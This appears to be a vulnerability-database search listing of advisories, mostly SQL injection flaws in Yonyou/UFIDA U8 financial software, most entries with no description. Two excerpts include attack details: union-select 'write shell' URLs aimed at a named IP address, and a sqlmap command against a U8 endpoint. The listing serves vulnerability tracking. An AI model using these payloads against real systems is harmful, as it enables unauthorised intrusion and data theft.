135 matches found
RUSTSEC-2020-0050 VecCopy allows misaligned access to elements
VecCopy::data is created as a Vec of u8 but can be used to store and retrieve elements of different types leading to misaligned access. The issue was resolved in v0.5.0 by replacing data being stored by Vec with a custom managed pointer. Elements are now stored and retrieved using types with prop...
CVE-2020-11650
An issue was discovered in iXsystems FreeNAS and TrueNAS 11.2 before 11.2-u8 and 11.3 before 11.3-U1. It allows a denial of service. The login authentication component has no limits on the length of an authentication message or the rate at which such messages are sent...
DOM Cross-Site Scripting Vulnerability in UFIDA U8+ Financial System
UFIDA U8+ is a fine piece of financial software. A stored cross-site scripting vulnerability exists in the UFIDA U8+ financial system. It allows an attacker to insert malicious JavaScript code into a page to obtain user cookies and other information, leading to user hijacking...
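SQL injection in a Yonyou (UFIDA) system
Brief description: An SQL injection that was not patched in time leads to getshell. Details: Affected IP: 139.129.98.49. Its ports 443 and 801 each run the U8 remote access application, which has a known SQL injection vulnerability. Vulnerability reference: WooYun: Two SQL injections in the Yonyou UP U8 system allow unrestricted getshell without login. Error: https://139.129.98.49/Server/CmxcheckBind.php?b=2&a=1%cc Write shell: http://139.129.98.49:801/Server/CmxcheckBind.php?b=2&a=1' and 1=2 union select...
Yonyou GRP-U8 financial management software: SQL injection vulnerability in the itype_id parameter of /R9iPortal/cm/cm_info_list.jsp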
No description provided by source...
Yonyou GRP-U8 system: SQL injection vulnerability in the uid parameter of external
No description provided by source...
Yonyou grp-u8 /services/userInfoWeb SQL injection
No description provided by source...
Yonyou GRP-U8 system: SQL injection in the login parameter UserNameText
No description provided by source...
Yonyou UP U8 system /Server/CmxUser.php blind SQL injection
No description provided by source...
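Yonyou UP U8 system: SQL injection vulnerabilities in 2 places, including /Server/CmxGetAppNameByUserName.php
0x01 Vulnerability summary: The Yonyou UP U8 system has SQL injection vulnerabilities in the following 2 places: 1. /Server/CmxGetAppNameByUserName.php, parameter User; 2. /Server/CmxCS.php, parameter pgid. A remote attacker can exploit the vulnerability to execute SQL statements without logging in. 0x02 Exploitation: 1. SQL injection 1: sqlmap.py -u "...:8080/Server/CmxCS.php?pgid=CSRemove" --dbms mysql --technique T --cookie "RASAdminUserInfoUserName=1" --data "CSID=1&CSID=1" -p CSID ...
Yonyou GRP u8 /persionTreeServlet?bmdm=1 SQL injection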
No description provided by source...
Yonyou GRP u8 /IMLoginServlet?uid=1&pwd=1 SQL injection
No description provided by source...
Yonyou UP U8 system Server/CmxRemoteDesktop.php SQL injection
No description provided by source...
Yonyou UP U8 system /Server/CmxMailSet.php SQL injection
No description provided by source...
Yonyou UP U8 system: SQL injection in parameter a of CmxcheckuserMachine.php
No description provided by source...
Yonyou GRP-u8 /UploadFile arbitrary file upload
No description provided by source...
Yonyou GRP-U8 gzQuerydetail: SQL injection vulnerability in the KJND parameter
No description provided by source...
Yonyou GRP-U8 management software /IMUnitServlet?pt=add&org_code=1 SQL injection
No description provided by source...
Yonyou GRP-U8 management software /IMRoleServlet?pt=del&rolecode=1 SQL injection
No description provided by source...
Yonyou GRP-U8 education financial management software /R9iPortal/cm/cm_function_save.jsp SQL injection
No description provided by source...